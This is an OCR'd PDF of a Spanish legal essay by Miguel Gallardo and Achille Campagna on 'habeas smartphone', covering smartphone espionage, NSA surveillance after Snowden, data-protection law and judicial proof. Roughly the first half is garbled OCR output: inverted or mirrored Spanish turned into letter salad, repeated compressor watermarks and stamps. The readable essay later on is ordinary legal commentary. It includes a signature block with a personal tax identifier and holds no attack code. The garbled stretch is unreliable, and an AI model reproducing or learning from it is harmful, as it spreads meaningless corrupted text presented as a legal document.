u9133011Q uT) °-'-'w-' T°P uioinu uT uiuisu os (soii.sui uuponb ou sond) opupoiou ou (suuujup souoiauoqdu op uioujsui op uauo pppqsod) ooTTodTq oqooq un oiqo U9TSflTDUOD so.qsui uuponb ou onbiod OuOJTO1. T° UO oiuL'ATum op u93TJSu (uoiuo ouois.rsu u[ o.iqos uZol.1o3 somouoi. ou 'suop op pupTs030u uís SOUOJTO1. op souunsn op uuoAuiii onb u913ulodo) oAtj.TsodsTp T°P u9TouzTTufll.ou ui uiud IuPLTOd opos uo OUOJTo1. T° uivaquo ST9-UuJAT s ouusTuoo o onb op uzoioo souxouol. ou 'opuoTuodxo OuOTA os OTflO3 'prpo1ou uo sisol.9dTq uun so onb osnoop oqop 'suurgup T

SOTO

onosqu

so uT3qO ui u9PuTu5U u UO P'e3TTdmT SouOTouoTTdu T °P op uOT330JTQ uT 'OuOJO[O1. TOP O1uiWJOS T°P uOT3uZTTuflYe u[ opuuqooAoldu 'onb u9Touqu1 u u upuojo ouuoju1 uo uOTouuuTju 13SO JTfl[3uT T

T°°D

T°P

UOTSnT3UOD

optrup op

so

'ioqi

I

sondoid-ouuoJuT io

j ijp oplJsDc[

TL

(g6D

s

«iEO

'iopuoj.o u op aiqwoidas

D

D7

LlÇflsdOU

O'J/dflfl

Dtj

OS

o opvzvnicrn Dq os ouof?lo io,, onb uo]pu onb (96 oTToJ) OpT3 uA N33 TOP ouuojuL T° uo opTuouoo oqooq un 'oi.usqo ou 'so OUOJTO1. T°P OuJos ¡OP UOT3uZTTunYu WJ usnuo ui uo oqsO. 0T1103 oparujoop uq ou 'Sj9-ufl3JAI TS OUuSTUTO3 'Opal3flTOAu.L sond oi.uosns 01 onb ToJSo ucloaruToop Auq °N O3OJiO3 T°


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ris rios J2N J29JSNV e ouoîoouopod 69165L609 OUOJoo M°n u9iaeqeJ i p p i° eTxleTI ..ioij,.j sorwj u9iJeqeJ re e1

op eip ouxsm

zoptreuio

JOTJN

sojie

op SepeUflJ swJ

oÍoieIIiAJg Ouesiuioo 1°P i'-'°"-''-'° i1od e re°w joqesj ewmoo egop so Jopaq.snnmpy 'TS SNOI33VSNVIJI A SOI3OON IU OAISÑri3X 9flTED iopoloj4 e..ionoN sop e %OOT fl '-'° 0OOTT010d dIU so JopqsTrntupy oÁno '(du) TS 5LOd S3riVRIVS?IdI"J2 oJouoJ,%J SOTIOIIVS3U e %O5 Un UO iÇ 'ouei10 %Q Ufl UO T0UU 'VIU3JAT 3IdOJXl oaouoiod si (si) riI5N35 NQI3VIARIOTNI 03U9fl00T0 OTpouJ uo 000iech uoruno..i eT op opTuouoo í°p eiotou eiomud wJ.

'3ieo

(iij)

°P''-'"PV °'°

o

soi.und So1.uorntS soj uo uotunso.i os uçtoeqeJ ej uo U9T3ed3Jed ,iocFe onb soqooq sorj uçnsnjTp ns Jìipoioe NdPD ns A T3T u9To13qe..T ej uo U9TcYedTotped unso.tcT ns J1paT3e e sepeuimeouo seT3uoTpp seso..iomnu ope3t3eJd ueq os esneo J1.UO3 TO el U3 0131UT JO OSO UOT3T1.SOAUT el OIOITTTA OpTuTp 31T 1110°N Pl°d op UOTSTUJOD eq

aid

lPPP

ZIJ3d OP0lVririIA ri3flNVVT soTorpin so sond

erpod SOT

'iiJ30

ESOF

uoud e 'so;UeAoToJ Uos LreuauuouT 01 onb 'UoTaqe eT op ¿ro.ne oi.unsoid iod oTosiuo. e Oqaoiop flS 0O3 OS S TeP OAOflU

OU

ipod

UO3 ieflUtJUOO poc1'e A

sop

aieoo

'U9TZYeT1SOAUT eT

SO304

s

SOT

Bled

Sol.UeAOT0J

J030leT3SO

iopod

eiecl eTIeSO3OU A o.uoUq2rod SO OpBqSoAUT 011103 ZOPU?UJOd e op OPTUO1.UO3 J0JAI SOTle3 op U9TOBIeT3OP BI -U9ToBqB TB3U U95flJp BJ A oucjojo BPBWBTI BI- sol.ueAoToJ T°P

SOTOIpU! SOp OUOLL1fl3UO3 'TeOT B1.STA

op O.Ufld

TO

OSOQ

(U9ToBqBJ BT op OPTUO1UO3 [0 aqos SOOJ3UO3 SOJTB1.OP OUB op oiqtuoTAOU op ) T? BUO3 ..iod IND A SOUJO1UI SO1.UnSV B BleT3UflUop

sBqonld ieouqej uoiìol

¡

Bsondns

:s?loDiN otjonbod jop BZUBU0A wj,, A (U9T3BqB op oqni.00 op e[ op seTp SO

SOT

B

't'TO

)


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ouioo

'5 PP p

[jT

u9Toeq'a12 j uoo ( 968(Zgami1.com i einda ) epuj L1fl3 3j opsp L'TO °P aIqtui3ip P T JP P oaLIoD UflU dM0 PP OTIeUOT3UflJ j

1SUUT Un

jp u9toqeJ

ej 3p

L51'T

T T

aquo ocq 38 mus rua ousix

'ssipoud soj 3nb Md.rD U3

ej e .resuod eq 'u9Tunol es p WI TTV 'eis j S3 iOpei1sTUTUTpe e1Çnz 'J4AM3 es3ldmo ej p opos ej eqUofl3U3 35 puop OSS3Td 31J0J4 OiOTJTpo I°P 6 euejd ej U3 OÍoiejjT OTIeSruTO3 ¡3 UO3 'eLTUeUJ ej iod '3tT3UieTA31d 3nb 3DflpOp S3jrA9m SOuoJI31. SO[ 3 3s sasipou3d O1.U3TUIeUOT3TSOd PP OTpfll.S3 J3Q STS3[J ZOUTOD 15 OPT1.S3AUT ¡3 UO3 UO.I3TUflOI OS

'S

sos

SOT j7TQ

op oiquloiAou

3tZT3iJfl iS IÇ PUJ is ssipouod p LT p ¡o onb euLnje MdPO WI OÍOITTTA

'15 OTi5TUTO3 Jop

jiisoiduio

UlOS 'S'e[[O SpO. OpUJiJ.U3 [ SPTn3UTA 'NdFO T TS SNOI0OINOId OIflÒId 'NflSNVW'TV 'pIs rici: XVUNV MOI3V9LLSAMI 5cNOL'TflSMO0

civunio

"v's

'NflSNVJN-qV

ODOJd OiOUT1U A i el ssoidmo sej op OOUOO OUIOO uonj u oso oj000 op eioq S3NOIODVSNV?LL A O9T6 SOI0ODM 0U OAISfl'I3X IfYI0 000uopod onb je 'u9Toeqe1 ej oanpoid os onb ep jo 'eurejj uqm ZOpUUiOj umso erjrnij JOtW SOji3 "ios J2N IISMV op oiqtuou op OSOJ jo L eOJy 'B15 feUOUTtJ.UOS eloied flS 'OIOJeTITA OTieSTuloo TO iod sopezqtn O.UOWfetITqLj OUOJJO). op SOJOUfl)U sorj 'OIOIeTTTA '15 oiiesiuioo fe ePeTnOUTA "15 SMOI00VSMV&L 9f1'I0 OAISflTI0X SOI3OOIN A op iqied e 'Osseurejr e osed PJQJJ XV?LLNV 'oÍiijiA OLIeSTUTO3 jOp 3ÍOi13d 'S?3iO [e3jJ joqesj emiuoo SO Oj eqoj eso op itred y 'zonupON opuopoj TOeJej TOO'L'9T eSeq OflJ JOPJSTUTWPV Ofl3 'TCEJJ XVLLNV U0JPUJ VS MV'1dflIfì VNI0VNkI e ounÍ onb y5 NVNWO V?II3VNH WI 'Vs MVèT3JiO V?13IDNVNIT 13A13flflJfl esoidwo ej op ouepioso.idoi qoj\\ d ej 'U103'ojqTSUosuoToemloJUT so uTqureJ4 op O3TUOO. SO 5OUOflj zOqoUe5 OiO 'OIOiejITA '15 OTJeSTmOO jop SO1eTITUIeJ UO3 U9T3ejOi OUOfl SO1.UOflj zoqoue 'i ¡o onb ewige SO SOJOpeJSIUTLUpe o ' (soi.uonj ZO1[3Lre5 uTnbeop 01P°d UO sOLflO op oun L S13TU9JOjO SOUOT3eSJOAUOD op u9Toeiodnooi UToeqei op sortuos 000ijo onb e3mJoJuT esoicluio)

's

L


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf °T°d

T

op

U.IOJ.U1

uOToqsoAuT

min OUIOO ou A sofeunquj4 so e oAod op soaisiuio soj iod opipoocïe ioqq ioqop fTo1pn1 UO13qSOAUT 011103 Sfl3 os onb soqoot soj onb ouio.qxo un s souoicnJns uos ou 1S

Top

uuuij

'(j) ssoiduio sepuruuoop

5O1.TJOTPUO3SOP

A (gi.7j) OÍOITTTA

A

opoq

S OTISTUTOO

[0

jno 'ioq

'.tolnut

îpoio arad uoo oonpj.

op U9pJfl3UA

ssoiduio spuiuuo;op

UO3

u9T3Jfl3uA oiqos sfl3 op 'ouoiooj o sopiode dND ¡op souiouj sounsy op SOT3TJO so] optjuos oso u sìsoiduio op opmaquo OSO op UOTO3tLfl.5u03 onb SOU0Wfl30 SOJ op1Odt3 um os ou 'so o.so 'iopo;u oqo so[BunqLn. osTpm Oqooq ¡o onb -joi.n-3 WSW u9T3qsoAuT op soipocu soi.o n A s000nl SOJ op u9rolsodslp 1oiqe oi.uonj min opzqqn SOTT31J0 OS

IS

S0.fl.S

01 SOT

OUTTXUT

UOEOI3OS

OU A

ojoo

'pTpO1O

uoToTnouTA

JO SOUIO3OUO3SOU

spurmj

3

T

op

O1.uOUJOl.UOI3TJflS

SpUrJJ

o.00dsoj

OIOITTTA

seplpuold'Luoo

SO OU

J

pT1oJo1

SESO Op OPEUO1.UO3

oi.unsoid io ouo

1oi.n

A

ujso Oqooq opunos ouoTpuodsonoo

i

T1UoUiflo0P

u opodos

TO '93LL os A otuoo 'pvpoJ. op;iod q os ou sond oqmj uoTouomn3Op uo uosns os oÍoiip S TOP TUOWUOS 1oid T A oJqTsuo uçnoeuuojuj oi.uo uoT0os u9TcYJnouTA u9izYeqa1 i op .xone ios op osoqoodsos ts 000uoosop o íqat. olpoul oso ar 'ZopUU1Oj IOTJAJ s To op OpTUO1.UO3 TOP u9TsnJTp eT op OT3TUT To 110 135O 'OCOIeTTTA Ts i opeJnouiA ouoarjsondns 'uoiomiuojui op oipoul un onb op eop souoT3ezteuT SoUoLflTs sej 0S1O312 J eAode oqooq .iouiud crep os onb 'soqooq soi.so e

T

uoqop

'sop.ei.uo3 iod

izrrI) «frTO

¡o op.rnnp uçnsofaic[ op ooync[woo op aIqwaiaot op s r y1 y tTO op alqwoiaoii ns y oJauaaI i os fi r yfj soopiinwjvoiziaunrnqoiso OP L T yjp ¡o 'yJoSOd uqos voziaIIç) oauoo olino) so onupipao O1.Uflípe OA'FqOie onb rnouapiao os,, sondo1d-ouuoJuT T°

UO


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf soj uo

u1qq

o

sstpouod

uos

sosondod

SOT

O

SOA

onb uono uo osuoj4 ouop000..icT so ou uouodo.icl os onb suosod sìj op osoi sopuTsoAuT ouioo U9T3BiJ3Op qooi oínpoid os ouigo iuqnosop oprnosuo3 onb 01 iod u9ioqaL SOALT WJ op U913 OU

ZOTd

SO Op

oi.olqo

sotooq

SO

SOUVL1VDN

SQ'I

U

OLSI

poT3id ZOA Ufl zopuLuoj 10W -'S T°P UOi3iI3OP xTnsoi pond onb oj op oToinriod uTs 'o19.ijnA Is O1ESIUO3 T

I ro

E.IUO3

'opid

ipp

UOpBS9AU p

SO3U oso

UE4SX

311b

nd

0U103 9JU93IJflS

E.I3psuo3

osondxo

OU

'T3ST

10d

01

oÍ\suom ¡°P

oi.d000..i

TOP

iopuopio

io uo 'oloojop ns uo 'o oi.uoipuodsoioo ¿ropTiuos o uo oppin TUIO oísuoîn uo opTuouoo ns iqoiduioo Joqop onb OpTUO.UO3 ns ootmioJuT oi.uod un opuodsonoo iuurxo arad oiqos irniuojui o ouisiui eOiUo9 1000qeo Jp so opeoTpuT m ooruoi000 ooiioo op osuom op JoTd000l SAU 0q39q j OEjfl3UA 9U9UIEUIU E.flUOfl3UQ ON Op uoo soaraiuoouo onb op ojnosqo 3S op sau sOU SUI ZOA Ufl 'L17T IT dN3 op or.wuoîounj ro iod opqTooi ooTu9i.00Jo oonoo op oCsuom o oiqos ompl 1Od T

osi.

opnd onb oj op u9TunoJ sondns so uo opuouoo jo soTu1000uoosop u uid 6 i uo uqaquoouo os souojoi. soj onb osipoio opond onb op op;jnso ¡ uoo os Touod so ig oim uo oTuod un iod opejop sm oqonui oipnl.so un osiooq 'oonj opsop 'Joqop 'suTd OP 'oSSOTd oiioj ujd epio uo umso onb .irpoio j op uisim un uo uqaquoouo os souojjoi. msui ipod 'oidiouud uo 'suoi.0 o T

opuoi.oid os i so onb po..io

iso

oqdui iod oporqno op oqooq jo oso loTnbjeno u uo1u oTp1 un os onb ooToI 000ii3d oiod o.ioqoi os onb op n1oqoo op orp io soru000uooso t'T T ) sojrA9m soj op suoìu op oìuoiuirniororsod t° opeipnso ZOA eun o1npod opTpo.io ouomouoioijns so ou os onb oonpop NdP3

'i

'ossoTd ouoJ4 op Tu1d 6

1

uo u9runol 'oqooq

100101. 13


PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ins) pap3qi[

u9E3cj un Sq3Tp

OjD

uompunJ soqoiop ornoo 's op os :ojqqnosip onb

ozid

'i''

u2d

sw

I3PnÇ upTozuon

UAOJJ ÁTnUJ uos sI3tIoTTIP j

'suiopy

1Ios !s .iod i3SO flO stiosod os 'op000d ou SOpSOAUT 01X103 U9TOEJJOOp oTpom A -e o3odsoJ ssondaid Si3uoTTTP swj s?mop OpsOp OiJ oLj- un ooq uoiorpoons soqooq soj u9To33Tuniuoo 5OAflTO1 Ufl OpTllfloSiiafl. 's3TUOfl30I0 S3U0T33TT1flUIO3 SJ Aoj op uçnsoo j oPduiT 'oqrno op si op LooI p3TJfl.Sfl[ So OU '3TUOqOoJo 001103 Op 50131A.TOS

sI

sop

usoid

WI

ouoiurpuu ouoipuodsauoo i° ournpou onb sejipduioo s_ A soornçupop S3TU9fl.30JO SOUOTOOTUnUIOO sns op uoiouoj.qo puodns onb ppput).uT soAtlîsodsTp sns op UOToUOA1O.uT i uomepunj oqooiop jo uo A souoroornnmoo jop oi.000s r uo SUO3 OTflOO oqooiop o cro uoTsTmo.fl.rn WI souoTonp SO3TUOJ3ofo soTpoln U0 OprnluoJui T[ oppouo ¡O OSflJOUI onb op U9T3T1SOAUT 'oqooq OSO oiqos [°!P1 U913 fl.SOAU un osixo onb OUO1.OU A ooijqid 50 opUrn-lo oaix?JN SOjqqO1dUIT onb so31u91130J0

sj

T

0;UOUI[ UOS oqoot.j oso op sOitSoA soAtsodsTp S0[ UO O OTIT3TUXOP

'osod UO

Oifl 0pJ3U0

oso onb op sopepijqsod swj zopuuioj °JN 1S i u9ioDnpoJd SOTOTpUI 50Uflf UO1.SXO 019S T°TT fls op uionqu j U9Toqw2 sondns a olnpoid os onb opsop oipoui A oi un 0U1fl35UJ

id

op SUT

S0IS

U

SJOUVJSèId

U

H OOINQN XEI'TII 03N103 cE OI3IA?1IS 50T[ V 5ONIVsIVUNVI A SOALLISOdSIU

MOI3NA{LNI U

SOflI3IJA[OU

OLLSID3i

A

SVSidW

A

VUVIJN

SVIDNOIIU

U

U9io3q11 j omnpoid os onb jo iod opom [O SOUJO3OUO3SO ponb oaodm pTpo10 onb UO O1UOUTOUJ [O OSO tsnio SO op o;oíqo soqooq soj uo U9icYdToT1.icT ns onb nb iToop oi.sq so[ioTjod 5OTIUOT3UnJ SO[ OIOIJOJ OS onb 0j 10d Ouoiu1uqnoSop Op 01.IIOP Ufl 1TflSUOO .5OO1DOS Op U9I3jOAO1 A

ojr uçYpqar opond oioos [T3Tjo U9plflol un oqos un op u9TsnJTp sond 'osso iod oso OSITprqSO op pqq onb [ 0;STA ioqeq OUJOI1.XO 'UOT3ULT0JUI J 3 qooiop JO iod iod U9I33TUflUIO3 op sopom

'pidui

ppod os U9i3n1.o

ns onb

0j


http://www.cita.es/flexispy-fiscal.pdf www.cita.es/querella-flexispy www.cita.es/flexispy-juzgado PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor tr?moJ Ties

OSUOJTV

:op

IP Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf SOUOI3fl13

sq op oaioos jop ouoiuruoj jo sojo.uT og zoputuaj 0A[S 3 SOji3 op OPT1.SOALII 011103 U013IT3OP

bITAI

NcIPO Ej op OV.13S9 ¡O UO SEj stpo; E ouodo os

SES9fldoId U93Efl3E op SE3UOflp

'ivsi

'J

1OUO1.LT

Oj

opol. JOd

[3SM opasiurJN o aid sojqTs1rnpuI ouowpn 'SAt.3OdS0Jd,, ST3TJOTTIP SpCUJJ 'T OJD Z0f1flU 110 LTIU0 'os000d op oofqo o oArntsuoo ou0mioppJoi onb o[op o1.iqui jo optrai:odns onb srnoUorp stunp op ¡EsG3od U0fl3 110 osJouo:I. uoqop U9pEOIJ;SflÇ Ej JIUIITOP op ioq souoroJopLSuo3 S2J op sqoni o1.UoUI[UTJ T

S0JO1Joj.t.r

Un uo st).Tiare iuoo i

iuo

A

sopuounptinj iod

A

SOLT3OJOP

LIIJOS

so ou

SOT

0Lj3010Q op opìs so] op u9pp!i0SU03

iuod os000d

SopLIoi3BTOJ O).U0UITIS 03011 OU soi.uouboro

'sopet.soAUT oqooq

0UoUIp0.

opinuo

1103

lop SOLIIJ So 1103 SAISfl.ITUT 105 iod

110

u9iobodoldsop flS iod

:sojqzqooi

onb iropisUoo STTflb so onb oprnsomsop oqur SSO

STOUOTTTP

'opuTdop

UOfl3 110 OpUolUol. A 'UOT3tJ.SoAUT

T

OP

Sj

sop) pprtut.ui (so.qsioi)

A

SOAtJOJ (soiuoipoo SoLIOT33iLIflUJO3 SoU0T33TUnUbO3 S3j op oi.oioos TO

oqooiop

T

A

'(souoiauoi.op JoTqnq

ppTJTqjoTAUi

OTJT3TTJJOp TOP

Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf


ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D

Firmado digitalmente por ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL NIF 07212602D Nombre de reconocimiento (DN): c=ES, o=FNMT, ou=FNMT Clase 2 CA, ou=703015345, cn=ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Fecha: 2016.08.06 19:58:27 +02'00'

HABEAS SMARTPHONE, HABEAS AUDIO Y HABEAS DATA PROBÁTICA CRIMINALÍSTICA EN TELEFONÍA CELULAR AVANZADA Y SU ESPIONAJE

Dr. e Ing. Miguel Gallardo , criptólogo y perito judicial privado en España y Avv. Achille Campagna , abogado y notario ejerciente en San Marino / Italia, por Asociación @APEDANICA Tel. (+34) 902998352 y E­mail: apedanica.ong@gmail.com El derecho penal contemporáneo, en la práctica, encuentra sus límites en el enjuiciamiento de lo que puede llegar a ser probado. Los viejos fundamentos teóricos del derecho romano se enfrentan a un nuevo escenario creado por aparatos que caben en el bolsillo y se integran en redes hipercomplejas. Entre Ulpiano o César y Google o Apple, existe una cambiante fenomenología que obliga a replantearse la doctrina aplicable en cada caso en el que un smartphone afecta o es afectado por un conflicto de derechos en los que los esclavos no tienen, o no están autorizados a utilizarlos, mientras que plebeyos con Android y patricios con Apple iPhone libran batallas desiguales en las que de vez en cuando un Espartaco amenaza a la Roma eterna hasta la invasión de los bárbaros. Las combinaciones de hechos y derechos relacionados con la telefonía móvil o celular son inabarcables, pero en lo que sigue se ofrecerán algunas definiciones intentando dividir categorizando situaciones de hecho en precedentes, bienes, daños y riesgos del derecho penal contemporáneo relacionables con los teléfonos móviles o celulares “smartphones”. ¿Qué es un “smartphone”? Google (y algo sabe de ellos) lo define así: smartphone, nombre masculino Teléfono celular con pantalla táctil, que permite al usuario conectarse a internet, gestionar cuentas de correo electrónico e instalar otras aplicaciones y recursos a modo de pequeño computador. sinónimos: teléfono inteligente Esta definición simplifica una realidad que determina y condiciona la actividad diaria de los profesionales del derecho probablemente más que ningún otro aparato lo haya hecho antes desde la invención de la imprenta de Gutenberg. Como decía Wittgenstein en su Tractatus1 “lo que puede mostrarse no puede decirse” y cualquier descripción de lo que es o no es un smartphone se ve ridiculizada por obsoleta y simplista en poco tiempo. ¿Qué puede hacer un “smartphone”? Quienes llevan tiempo utilizando uno y exploran sus límites tecnológicos saben que el potencial es inabarcable porque hasta los más expertos se sorprenden por las innovaciones que compiten como aplicaciones (apps) disponibles en las tiendas virtuales, pero en principio, un smartphone puede hacer prácticamente todo lo que puede hacer un ordenador personal, en cualquier lugar y por supuesto, el smartphone, tanto si es básico en uso muy primitivo, como si es de última generación utilizado por un sofisticadísimo hacker, no deja de ser también un teléfono. Tractatus Logico­Philosophicus 4.1212 (English) ­ kfs

1

www.kfs.org/jonathan/witt/t41212en.html 4.1212 : What can be shown cannot be said . Lo que se puede mostrar no se puede decir.


Por lo tanto, todo el derecho informático y telefónico tal y como se les concibe hasta ahora, es parte del derecho de los smartphones, pero su pequeño tamaño, altísima disponibilidad en uso masivo y la creciente complejidad de sus sistemas en red han hecho explotar una casuística y una fenomenología que sorprende sin preparación alguna a los juristas más tecnológicos, en situaciones límite. La integración de audio y video con datos y metadatos en un pequeño aparato que cabe en un bolsillo ha creado un nuevo escenario jurídico y una problemática en la que el perito puede alterar cualquier enjuiciamiento posible. ¿Cuáles son los principales riesgos y oportunidades para el jurista? El “habeas data” forma parte de las modernas constituciones y se desarrolla en los ordenamientos jurídicos de todos los países, actualmente. El derecho comunitario europeo emite directivas que se transponen a las legislaciones nacionales y el Tribunal de Justicia de la Unión Europea ha dictado muy relevantes sentencias que afectan a los datos personales así como al mercado y a los consumidores intentando protegerles de monopolios u oligopolios y abusos de posiciones dominantes. Sin embargo, la realidad es que existen dos modelos de sistemas que se han impuesto, el elitista cerrado del Apple iPhone y el gran conquistador de industrias y mercados de Google Android. No hay medallas de bronce en unas tecnologías tan competitivas que han extinguido por extenuación a líderes anteriores con productos diferenciados como Nokia (symbian), Blackberry, Motorola y hasta a la mismísima Microsoft. Las guerras de patentes en el más cruel derecho industrial, la competencia más feroz y tramposa crean litigios nunca antes vistos ni imaginados entre Apple, Google, Samsung, Oracle y Microsoft, entre otros grandes monstruos, y de ellos con gobiernos o instituciones supranacionales como la Unión Europea, así como con todo tipo de consumidores y usuarios. Hasta la más simple de las redes sociales y por supuesto Twitter, FaceBook FB, Google+ G+ y sistemas de comunicaciones multimedia como Whatsapp o Telegram, generan por sí mismas, y en su relación con millones de smartphones, un nuevo mundo en el que parece que los juristas llegan con retraso, pereza, miedo e ignorancia, a veces (mal) deliberada2. Espionaje masivo de smartphones Pero desde las revelaciones de Edward Snowden3 sobre el uso y abuso de los metadatos por parte de las agencias de seguridad o servicios de inteligencia como la National Security 2

Sobre el concepto y la jurisprudencia de la ignorancia deliberada, citando la STS Sala de lo Penal de 9 de junio de 2015 ( rec. 1665/2014) ver http://www.miguelgallardo.es/ignorancia­deliberada.pdf 3 E dward Snowden ­ Wikipedia, la enciclopedia libre

https://es.wikipedia.org/wiki/ Edward _ Snowden Edward Joseph Snowden (Elizabeth City, 21 de junio de 1983) es un consultor tecnológico estadounidense, informante , antiguo empleado de la CIA (Agencia Central de Inteligencia) y de la NSA (Agencia de Seguridad Nacional). En junio de 2013, Snowden hizo públicos, a través de los periódicos The Guardian y The Washington Post , documentos clasificados como alto secreto sobre varios programas de la NSA, incluyendo los programas de vigilancia masiva PRISM y XKeyscore


Agency NSA, el derecho no ha reaccionado ante el espionaje masivo del que todos los usuarios de smartphones son víctimas, lo sepan o no. En España, la Audiencia Nacional se negó a enjuiciar4 los hechos revelados por Snowden y no constan resoluciones judiciales relevantes sobre el espionaje masivo de la NSA en ningún país del mundo. Tampoco abrió expediente5 la Agencia Española de Protección de Datos AEPD ni se conoce que otras autoridades garantes de la privacidad nacionales ni europeas como el Grupo de Trabajo del Artículo 29 (GT 29), creado por la Directiva 95/46/CE de la Unión Europea6 ni el tribunal de europeo de Derechos Humanos7 lo hayan hecho, al menos eficazmente, hasta ahora. Más allá de la normativa y la jurisprudencia europea, se ha debatido en las Naciones Unidas sobre el derecho a la intimidad como un grave problema de la humanidad actualmente. El artículo 12 de la Declaración Universal de los Derechos Humanos, dice: “ Nadie será objeto de injerencias arbitrarias en su vida privada, su familia, su domicilio o su correspondencia, ni de ataques a su honra o a su reputación. Toda persona tiene derecho a la protección de la ley contra tales injerencias o ataques ”. Algunas revelaciones de Edward Snowden señalaban a las mismas Naciones Unidas y a sus más altos representantes como objeto y objetivo del espionaje de la NSA. No solamente fue una cuestión de principios, sino una reacción al espionaje de cargos y funcionarios la resolución A/RES/68/167 “El derecho a la privacidad en la era digital”8 es pura filosofía moral y política internacionalista que, después de afirmar, reafirmar, observar, acoger, reconocer, destacar, poner de relieve9 (verbos mucho más filosóficos que los que se emplean en los códigos civiles, administrativos sancionadores o penales), ¿concreta la actuación de la ONU sobre el espionaje masivo? HABEAS SMARTPHONE y sus habeas metadata/data/audio/video Aunque no debe confundirse el derecho con el enjuiciamiento para fijar ideas y concretar los paradigmas documentables de la problemática jurídica y pericial de los smartphones, pueden referenciarse algunos casos controvertidos que no sirven de precedente ni de jurisprudencia válida, porque, vistas en perspectiva histórica las resoluciones judiciales, de la misma manera que el derecho informático de los años 80 no producía autos y sentencias sostenibles pocos años después, muy probablemente las primeras resoluciones sobre smartphones tampoco estén creando doctrina científica y jurídicamente sostenible10. 4

La asociación APEDANICA presentó la querella que puede verse en http://www.miguelgallardo.es/querella­nsa.pdf agotando los recursos de reforma y apelación. Los documentos judiciales relevantes constan como anexos A2. de la tesis doctoral de Miguel Gallardo en http://miguelgallardo.es/tesis.pdf 5 La denuncia http://www.miguelgallardo.es/aepd­booz.pdf se presentó contra la empresa Booz Allen Hamilton en la que trabajaba Edward Snowden, siendo particularmente relevante el recurso de reposición contra la resolución de archivo en http://www.miguelgallardo.es/recurso­booz.pdf 6 D ata Protection D irective (95/46/EC) ­ EUR­Lex ­ Europa.eu en castellano en http://ec.europa.eu/justice/policies/privacy/docs/95­46­ce/dir1995­46_part1_es.pdf y en todos los idiomas europeos en http://eur­lex.europa.eu/legal­content/EN/TXT/?uri=URISERV%3Al14012 7 Hay al menos dos referencias en el Tribunal Europeo de Derechos Humanos Application no. 24960/15 en http://hudoc.echr.coe.int/eng?i=001­159526 y Application no. 58170/13 en http://hudoc.echr.coe.int/eng?i=001­140713 8 Organización de las Naciones Unidas http://www.un.org/es/comun/docs/?symbol=A/RES/68/167 9 Pág. 69 y ss. o.c. http://miguelgallardo.es/tesis.pdf 10 En agosto de 2016 la palabra “smartphone” es citada en 67 resoluciones de la jurisprudencia del Consejo General del Poder Judicial en http://www.poderjudicial.es/search/indexAN.jsp


Así las cosas, ha de proponerse alguna definición, aunque sea provisionalmente, para el derecho de los smartphones, diferenciando las teorizaciones especulativas, de las cuestiones y dilemas que afrontan jueces, fiscales y abogados cuando un smartphone es mencionado, o si ni siquiera se menciona pero afecta a hechos relevantes y derechos en un procedimiento judicial. De este derecho del smartphone, un elemento conceptual es el “habeas”, en el sentido latino de “tener presente”, a semejanza de lo que se expresa en latín casi universalmente con el “habeas corpus”, especialmente cuando el juez tiene presente que existe un smarphone y que las acciones u omisiones judiciales pueden afectar a derechos fundamentales de la persona, los colectivos, las sociedades e industrias e incluso a la soberanía de las naciones y al orden económico mundial. No se trata aquí de detallar todas las tecnologías intrusivas, ni siquiera las que pueden afectar a un teléfono en cualquier país. Deliberadamente se obvian las intervenciones telefónicas clásicas en sistemas equivalentes al SITEL en España, aunque la inmensa mayoría de las escuchas de las que se tiene conocimiento en sedes judiciales dependan de grandes sistemas centralizados que afectan por igual a teléfonos fijos y móviles o celulares, y en estos últimos, incluso con geoposicionamiento retrospectivo bien referenciado11. Pero no es una cuestión menor el acceso masivo a todo lo intervenido por orden judicial para el rastreo de indicios mediante inteligencia artificial sobre reconocimiento de voces12. La categorización fenomenológica de lo que aquí denominamos “HABEAS SMARTPHONE” 13 debe diferenciar hechos y riesgos, internos y externos, propios y ajenos, legales e ilegales. Pero reiterando que el derecho penal contemporáneo, en la práctica, encuentra sus límites en el enjuiciamiento de lo que puede llegar a ser probado. Los supuestos y las especulaciones teóricas pronto se alejan de la realidad judicial, en la que cada vez son más los smartphones incautados que pasan años sin ser analizados, se tiene conocimiento de impunes intervenciones intrusivas extremadamente perversas y unas pocas personas jurídicas, especialmente un grupo de multinacionales que compiten y cooperan para repartirse un mercado en el que también tratan de protegerse de los intentos de los gobiernos de controlar a quienes controlan a quienes controlan o “metacontrolar”. Desde el robo casual y fortuito de un smartphone que resulta tener datos, audio o vídeo de sensibilidad y riesgo para su propietario pero también para terceros, por ejemplo, si se trata de un abogado cuyos clientes han confiado sus secretos representados en whatsapps o conversaciones o imágenes recuperables, hasta las más excepcionales leyes aplicadas por servicios de inteligencia como la National Security Agency NSA y la Central Intelligence Agency CIA en la lucha contra el terrorismo y el crimen organizado internacional, existe una 11

Sobre SITEL en España http://cita.es/escuchas y documento www.cita.es/sitel.pdf La misteriosa empresa española AGNITIO se dedica a ello. Pueden encontrarse 184 referencias en los archivos de HackingTeam, 21 en G lobal Intelligence Files y 6 en The Spy Files según consta en https://search.wikileaks.org/?q=agnitio 13 L a frase legal que aquí se propone se utilizaría en latín, cuya traducción más literal es «tener 12

